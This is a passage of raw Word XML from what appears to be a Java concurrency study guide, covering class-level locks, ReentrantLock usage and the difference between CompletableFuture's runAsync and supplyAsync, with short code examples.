    <w:p w14:paraId="6875C3CA" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is useful for synchronizing static methods or shared resources that belong to the class, rather than an instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E507E9" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This allows all threads to synchronize on the same class-level lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D1BDB" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using ReentrantLock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D292D3"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Instead of using synchronized blocks, you can use ReentrantLock from the java.util.concurrent.locks package for more advanced synchronization mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A578292"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import java.util.concurrent.locks.Lock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A38CD51"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import java.util.concurrent.locks.ReentrantLock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502971B2" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FB8843"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public class MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA760EF"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private final Lock lock = new ReentrantLock(); // Lock object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E8E90" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EFE6B4"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public void myMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7270AA"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lock.lock();  // Acquire the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D590B89"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1C889E"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 Critical section code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB20D5C"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 finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B754D8"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lock.unlock();  // Ensure the lock is released</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EB4D1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AB814E"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C5CD6"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD24CDE" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Why use ReentrantLock?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DBB34C" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ReentrantLock provides more flexibility than the synchronized keyword. It allows features like try-lock, timed lock, or interruptible lock attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A2B7F" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It is more suitable when you need more control over locking behavior than the synchronized block offers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE38C84" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D928B94" w14:textId="77777777" w:rsidR="00CE5D34" w:rsidRPr="00414276" w:rsidRDefault="00CE5D34" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1262"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized(this)</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be replaced with a custom object (synchronized(lock)), the class-level lock (synchronized(MyClass.class)), or even with ReentrantLock for advanced lock management. The choice depends on the context and your synchronization requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C31C26D" w14:textId="7BC9E10A" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00096260">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="6F67CA54">
          <v:rect id="_x0000_i1865" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEAFA9C" w14:textId="0292903E" w:rsidR="00383507" w:rsidRPr="00CE4B95" w:rsidRDefault="00383507">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="294" w:name="_Toc196307774"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="006E0EC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00D45C3E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sync vs supply</w:t>
      </w:r>
      <w:r w:rsidR="00D45C3E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sync?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="294"/>
    </w:p>
    <w:p w14:paraId="2FF6D5D6" w14:textId="4E810261" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1">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difference between </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>supplyAsync()</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runAsync()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java's CompletableFuture lies in whether the task you're executing returns a result or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B3E3B" w14:textId="77777777" w:rsidR="00D15061" w:rsidRPr="00CE4B95" w:rsidRDefault="00D15061" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7630DC" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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supplyAsync()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D231E6C" w14:textId="77777777" w:rsidR="004053D9" w:rsidRPr="00CE4B95" w:rsidRDefault="004053D9" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703D31A6" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Used when you want to execute an asynchronous task </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>that returns a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A6A350" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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turn Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: CompletableFuture&lt;T&gt; where T is the type of the result returned by the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4378F" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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put</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Takes a Supplier&lt;T&gt; — a functional interface that provides a result (of type T).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756460C2" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use this method when you need to perform an asynchronous operation that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>computes a value</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produces a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA60FAF" w14:textId="77777777" w:rsidR="009C2101" w:rsidRPr="00CE4B95" w:rsidRDefault="009C2101" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAC6126" w14:textId="77777777" w:rsidR="009C2101" w:rsidRPr="00CE4B95" w:rsidRDefault="009C2101" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E0DD67" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651B0F3B" w14:textId="77777777" w:rsidR="00A970A2" w:rsidRPr="00CE4B95" w:rsidRDefault="00A970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9964825"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CompletableFuture</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> futur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CompletableFutur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supplyAsync</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g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5A2442B1" w14:textId="77777777" w:rsidR="00A970A2" w:rsidRPr="00CE4B95" w:rsidRDefault="00A970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9964825"/>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Simulate some computation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1F6E99" w14:textId="77777777" w:rsidR="00A970A2" w:rsidRPr="00CE4B95" w:rsidRDefault="00A970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9964825"/>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return</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42</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE2A572" w14:textId="77777777" w:rsidR="00A970A2" w:rsidRPr="00CE4B95" w:rsidRDefault="00A970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9964825"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0143A5AA" w14:textId="789A164D" w:rsidR="00A970A2" w:rsidRPr="00CE4B95" w:rsidRDefault="00A970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9964825"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>future</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thenAccep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result </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-&g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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Result: "</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resul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Output: Result: 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C4F231" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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 supplyAsync runs the task in a separate thread and returns the result 42, wrapped in a CompletableFuture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBACAF8" w14:textId="77777777" w:rsidR="00303C02" w:rsidRPr="00CE4B95" w:rsidRDefault="00303C02" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388C326B" w14:textId="47979EFA" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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runAsync()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5289E9A7" w14:textId="77777777" w:rsidR="00BF5C2D" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF5C2D" w:rsidP="006E0EC1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75770CEF" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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rpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Used when you want to execute an asynchronous task </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>that does not return a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73381366" w14:textId="77777777" w:rsidR="006E0EC1" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0EC1" w:rsidP="006E0EC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turn Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
